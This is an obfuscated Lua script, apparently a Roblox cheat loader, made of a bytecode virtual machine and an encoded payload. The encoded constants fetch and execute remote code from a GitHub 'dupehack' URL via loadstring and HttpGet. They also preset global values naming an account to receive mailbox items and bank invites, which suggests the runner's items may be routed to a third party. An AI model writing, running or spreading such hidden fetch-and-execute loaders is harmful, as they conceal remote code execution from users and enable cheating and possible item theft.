--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32=(927 -(214 + 713)) -0 ;local v33;local v34;while true do if (v32==(2 -1)) then return (v34 * (493 -237)) + v33 ;end if ((0 -0)==v32) then v33,v34=v1(v16,v19,v19 + (621 -(139 + 416 + 64)) );v19=v19 + (933 -(857 + 12 + 62)) ;v32=569 -(367 + 201) ;end end end v18=3;end if (v18==4) then function v25()local v35=877 -(165 + 117 + 595) ;local v36;local v37;local v38;local v39;local v40;local v41;while true do if ((1639 -(1523 + 114))==v35) then v40=v21(v37,19 + 2 ,43 -12 );v41=((v21(v37,1097 -(68 + 997) )==((1671 -400) -(226 + (2231 -(1069 + 118))))) and  -(4 -(6 -3))) or (118 -(32 + 85)) ;v35=3 + 0 ;end if (v35==3) then if (v40==0) then if (v39==(0 + 0)) then return v41 * (957 -(892 + 65)) ;else v40=2 -1 ;v38=0 -0 ;end elseif (v40==(3757 -1710)) then return ((v39==0) and (v41 * ((351 -(87 + 263))/(180 -(67 + (247 -134)))))) or (v41 * NaN) ;end return v8(v41,v40-1023 ) * (v38 + (v39/((2 + 0)^52))) ;end if (v35==((0 + 0) -(0 -0))) then v36=v24();v37=v24();v35=1 + 0 ;end if (v35==(3 -2)) then v38=953 -(802 + 150) ;v39=(v21(v37,2 -(1 + 0) ,(827 -(368 + 423)) -16 ) * ((2 + 0)^(1029 -(915 + 82)))) + v36 ;v35=(15 -10) -3 ;end end end v26=nil;function v26(v42)local v43;if  not v42 then v42=v24();if (v42==(18 -(10 + 8))) then return "";end end v43=v3(v16,v19,(v19 + v42) -(3 -2) );v19=v19 + v42 ;local v44={};for v68=443 -(416 + 26) , #v43 do v44[v68]=v2(v1(v3(v43,v68,v68)));end return v6(v44);end v18=5;end if (v18==6) then v29=nil;function v29()local v45=65 -(30 + 35) ;local v46;local v47;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v45==3) then v52=nil;v53=nil;v45=3 + 1 ;end if (v45==(3 -1)) then v50=nil;v51=nil;v45=3;end if (v45==0) then v46=0;v47=nil;v45=1;end if (v45==1) then v48=nil;v49=nil;v45=4 -2 ;end if (v45==(14 -10)) then while true do if (v46==(0 -0)) then local v96=580 -(361 + 219) ;while true do if (v96==(320 -(53 + 267))) then v47=0;v48=nil;v96=868 -(550 + 317) ;end if (v96~=1) then else v46=1 -0 ;break;end end end if (v46==(1 -0)) then local v97=0 -0 ;while true do if (v97==0) then v49=nil;v50=nil;v97=983 -(18 + 964) ;end if (v97==(3 -2)) then v46=2;break;end end end if (v46~=(287 -(134 + 151))) then else local v98=0;while true do if (v98==(1666 -(970 + 695))) then v46=2 + 1 ;break;end if (v98==0) then v51=nil;v52=nil;v98=1 -0 ;end end end if (3~=v46) then else v53=nil;while true do local v99=0 + 0 ;while true do if (v99~=(1991 -(582 + 1408))) then else if (v47==(0 -0)) then v48={};v49={};v50={};v47=127 -(116 + 10) ;end if (v47==(1 -0)) then local v102=0;local v103;while true do if (v102==0) then v103=0;while true do if (v103==0) then v51={v48,v49,nil,v50};v52=v24();v103=1 -0 ;end if (v103~=(1 + 0)) then else v53={};v47=243 -(187 + 54) ;break;end end break;end end end break;end if (0==v99) then if (v47~=3) then else local v104=780 -(162 + 618) ;while true do if (v104==(0 + 0)) then for v158=1 + 0 ,v24() do v49[v158-(1 -0) ]=v29();end return v51;end end end if (v47==(2 -0)) then for v106=2 -1 ,v52 do local v107=0 + 0 ;local v108;local v109;local v110;local v111;while true do if (v107~=(1637 -(1373 + 263))) then else v110=nil;v111=nil;v107=1002 -(451 + 549) ;end if (v107~=(0 + 0)) then else v108=0 -0 ;v109=nil;v107=1 -0 ;end if (v107==(1123 -(118 + 1003))) then while true do if (v108==(1384 -(746 + 638))) then v109=0 -0 ;v110=nil;v108=1 + 0 ;end if (v108==(1 -0)) then v111=nil;while true do if (v109~=(341 -(218 + 123))) then else local v182=0;while true do if (v182~=(1581 -(1535 + 46))) then else local v186=977 -(553 + 424) ;while true do if (v186~=(1 -0)) then else v182=1 + 0 ;break;end if (v186~=(0 + 0)) then else v110=v22();v111=nil;v186=1;end end end if (v182==1) then v109=1;break;end end end if (v109~=1) then else if (v110==(1 + 0)) then v111=v22()~=(0 + 0) ;elseif (v110==(562 -(306 + 254))) then v111=v25();elseif (v110==3) then v111=v26();end v53[v106]=v111;break;end end break;end end break;end end end v51[3]=v22();for v112=1 + 0 ,v24() do local v113=0;local v114;local v115;local v116;local v117;while true do if ((5 -3)~=v113) then else while true do if (v114==(1 -0)) then v117=nil;while true do if (v115~=(1468 -(899 + 568))) then else while true do if (v116==(0 + 0)) then v117=v22();if (v21(v117,2 -1 ,2 -1 )==0) then local v187=0 + 0 ;local v188;local v189;local v190;local v191;while true do if (v187~=0) then else v188=0 -0 ;v189=nil;v187=754 -(239 + 514) ;end if (v187==(1 + 0)) then v190=nil;v191=nil;v187=605 -(268 + 335) ;end if (v187~=(2 + 0)) then else while true do if (v188~=(290 -(60 + 230))) then else v189=v21(v117,2,575 -(426 + 146) );v190=v21(v117,1 + 3 ,6);v188=1;end if (v188==(1457 -(282 + 1174))) then local v193=811 -(569 + 242) ;while true do if ((0 -0)==v193) then v191={v23(),v23(),nil,nil};if (v189==(0 + 0)) then local v199=0;local v200;local v201;while true do if (v199==(0 + 0)) then local v203=0;while true do if (v203==(1 -0)) then v199=239 -(64 + 174) ;break;end if (v203==0) then v200=0;v201=nil;v203=1 + 0 ;end end end if ((1025 -(706 + 318))==v199) then while true do if (v200~=(336 -(144 + 192))) then else v201=1251 -(721 + 530) ;while true do if (v201==(0 + 0)) then v191[1274 -(945 + 326) ]=v23();v191[9 -5 ]=v23();break;end end break;end end break;end end elseif (v189==(1 + 0)) then v191[1507 -(363 + 1141) ]=v24();elseif (v189==(1582 -(1183 + 397))) then v191[3]=v24() -((2 + 0)^(716 -(271 + 429))) ;elseif (v189==(3 + 0)) then local v209=0;local v210;local v211;while true do if (v209~=(1501 -(1408 + 92))) then else while true do if (v210==(0 + 0)) then v211=1086 -(461 + 625) ;while true do if (v211==(1975 -(1913 + 62))) then v191[1291 -(993 + 295) ]=v24() -(2^(1 + 15)) ;v191[4]=v23();break;end end break;end end break;end if (v209==(1171 -(418 + 753))) then local v214=0;while true do if (v214~=(0 + 0)) then else v210=0;v211=nil;v214=3 -2 ;end if (v214~=1) then else v209=1 + 0 ;break;end end end end end v193=1 + 0 ;end if ((1 + 0)==v193) then v188=2;break;end end end if (v188~=(2 + 0)) then else local v194=529 -(406 + 123) ;local v195;while true do if (v194==0) then v195=1769 -(1749 + 20) ;while true do if ((1 + 0)==v195) then v188=1325 -(1249 + 73) ;break;end if (0==v195) then if (v21(v190,1,1 + 0 )~=(1146 -(466 + 679))) then else v191[306 -(244 + 60) ]=v53[v191[2 + 0 ]];end if (v21(v190,478 -(41 + 435) ,2)==(2 -1)) then v191[3]=v53[v191[8 -5 ]];end v195=1901 -(106 + 1794) ;end end break;end end end if (v188==(1 + 2)) then if (v21(v190,1 + 2 ,3)==(2 -1)) then v191[10 -6 ]=v53[v191[3 + 1 ]];end v48[v112]=v191;break;end end break;end end end break;end end break;end if (v115==0) then local v184=1138 -(782 + 356) ;local v185;while true do if (v184~=(114 -(4 + 110))) then else v185=584 -(57 + 527) ;while true do if (v185==0) then local v192=0;while true do if (v192==(1427 -(41 + 1386))) then v116=0;v117=nil;v192=104 -(17 + 86) ;end if (v192~=(1 + 0)) then else v185=1876 -(157 + 1718) ;break;end end end if (v185~=(1 -0)) then else v115=2 -1 ;break;end end break;end end end end break;end if (v114==(0 -0)) then local v178=166 -(122 + 44) ;while true do if ((1018 -(697 + 321))==v178) then v115=0;v116=nil;v178=2 -1 ;end if (v178~=(1 -0)) then else v114=3 -2 ;break;end end end end break;end if (v113~=(0 + 0)) then else v114=0 + 0 ;v115=nil;v113=1 -0 ;end if ((1 -0)==v113) then v116=nil;v117=nil;v113=2;end end end v47=7 -4 ;end v99=1;end end end break;end end break;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54)if (v1(v54,2)==79) then v20=v0(v3(v54,1,1));return "";else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v54,16));if v20 then local v100=0;local v101;while true do if (v100==1) then return v101;end if (v100==0) then v101=v5(v85,v20);v20=nil;v100=1;end end else return v85;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v55,v56,v57,v58=v1(v16,v19,v19 + (1192 -(449 + 740)) );v19=v19 + (876 -(826 + 46)) ;return (v58 * 16777216) + (v57 * (66763 -(322 + 905))) + (v56 * (867 -(602 + 3 + 6))) + v55 ;end v25=nil;v18=4;end if (v18==7) then function v30(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v70=v62;local v71=v63;local v72=v64;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v86=0,v78 do if (v86>=v72) then v76[v86-v72 ]=v77[v86 + 1 ];else v80[v86]=v77[v86 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do local v87=0;while true do if (v87==1) then if (v83<=11) then if (v83<=5) then if (v83<=2) then if (v83<=0) then v74=v82[3];elseif (v83>1) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end else local v135=0;local v136;while true do if (v135==0) then v136=v82[2];v80[v136]=v80[v136](v13(v80,v136 + 1 ,v75));break;end end end elseif (v83<=3) then local v119=v82[2];v80[v119]=v80[v119]();elseif (v83>4) then v80[v82[2]]=v82[3];else local v139=v82[2];v80[v139]=v80[v139]();end elseif (v83<=8) then if (v83<=6) then local v121=0;local v122;local v123;local v124;local v125;while true do if (v121==0) then v122=v82[2];v123,v124=v73(v80[v122](v13(v80,v122 + 1 ,v82[3])));v121=1;end if (v121==2) then for v166=v122,v75 do v125=v125 + 1 ;v80[v166]=v123[v125];end break;end if (v121==1) then v75=(v124 + v122) -1 ;v125=0;v121=2;end end elseif (v83==7) then local v141=0;local v142;local v143;while true do if (v141==1) then v80[v142 + 1 ]=v143;v80[v142]=v143[v82[4]];break;end if (0==v141) then v142=v82[2];v143=v80[v82[3]];v141=1;end end else v80[v82[2]]=v82[3];end elseif (v83<=9) then v80[v82[2]][v82[3]]=v82[4];elseif (v83==10) then v74=v82[3];else do return;end end elseif (v83<=17) then if (v83<=14) then if (v83<=12) then v80[v82[2]]();elseif (v83>13) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end else v80[v82[2]][v82[3]]=v82[4];end elseif (v83<=15) then local v128=v82[2];v80[v128]=v80[v128](v13(v80,v128 + 1 ,v75));elseif (v83==16) then v80[v82[2]]=v61[v82[3]];else for v161=v82[2],v82[3] do v80[v161]=nil;end end elseif (v83<=20) then if (v83<=18) then local v130=v82[2];local v131=v80[v82[3]];v80[v130 + 1 ]=v131;v80[v130]=v131[v82[4]];elseif (v83==19) then v80[v82[2]]=v61[v82[3]];else local v153=0;local v154;local v155;local v156;local v157;while true do if (v153==0) then v154=v82[2];v155,v156=v73(v80[v154](v13(v80,v154 + 1 ,v82[3])));v153=1;end if (v153==2) then for v179=v154,v75 do v157=v157 + 1 ;v80[v179]=v155[v157];end break;end if (v153==1) then v75=(v156 + v154) -1 ;v157=0;v153=2;end end end elseif (v83<=21) then v80[v82[2]]();elseif (v83==22) then for v163=v82[2],v82[3] do v80[v163]=nil;end else do return;end end v74=v74 + 1 ;break;end if (v87==0) then v82=v70[v74];v83=v82[1];v87=1;end end end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v65,v66,v67)if v67 then local v88=(v65/((1900 -(260 + (1852 -(22 + 192))))^(v66-((1124 -(483 + 200)) -(382 + 58)))))%((6 -4)^(((v67-((1464 -(1404 + 59)) + 0)) -(v66-(1 -0))) + ((1692 -(1121 + 569)) -1))) ;return v88-(v88%(1206 -(902 + (829 -526)))) ;else local v89=(3 -1)^(v66-(2 -1)) ;return (((v65%(v89 + v89))>=v89) and (1 + 0)) or 0 ;end end v22=nil;v18=2;end end end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4E756B655673436974792F5363726970747332302O322F6D61696E2F647570656861636B03073O0067657467656E76031A3O00596F7572412O634E616D6554686174476574734D61696C626F78030B3O00583250656E697765697332031A3O00596F7572412O636F756E744964466F7242616E6B496E76697465022O002023A8DEE641001C3O0012083O00014O0016000100013O00260E3O00020001000100044O00020001001208000100013O00260E0001000F0001000200044O000F0001001210000200033O001210000300043O002012000300030005001208000500064O0006000300054O000F00023O00022O000C00020001000100044O001B000100260E000100050001000100044O00050001001210000200074O000300020001000200300D000200080009001210000200074O000300020001000200300D0002000A000B001208000100023O00044O0005000100044O001B000100044O000200012O00173O00017O00",v9(),...);end
